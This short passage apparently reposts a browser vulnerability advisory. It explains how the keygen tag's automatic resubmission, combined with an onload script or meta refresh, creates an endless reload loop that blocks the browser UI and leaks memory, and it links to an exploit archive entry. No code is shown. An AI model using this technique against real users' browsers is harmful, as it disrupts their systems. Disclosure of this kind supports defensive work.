ふむぅ・・・・

II. Description
~~~~~~~~~~~~~~
This bug is a simple design bug that results in an endless loop (and interesting
memory leaks).

Once upon a time Netscape thought it would be a great idea to add the keygen tag
() as a feature to their Browser. The keygen tag offers a simple way
of automatically generating key material using various algorithms. For instance
it is possible to generate RSA, DSA and EC key material.

"The public key and challenge string are DER encoded as PublicKeyAndChallenge and
then digitally signed with the private key to produce a SignedPublicKeyAndChallenge.
The SignedPublicKeyAndChallenge is base64 encoded, and the ASCII data is finally
submitted to the server as the value of a name-value pair, where the name is
specified by the NAME attribute of the KEYGEN tag."

More information: https://developer.mozilla.org/En/HTML/HTML_Extensions/KEYGEN_Tag

This feature includes the automatic submission of the public part to a script,
the crux. The Keygen tag reloads the document by submitting the public key as an argument
to the current URI. Combining this with a javascript body onload() call
(or meta refresh) results in an neat endless loop blocking access to the UI.

Furthermore memory is leaked during the process.

http://www.milw0rm.com/exploits/8822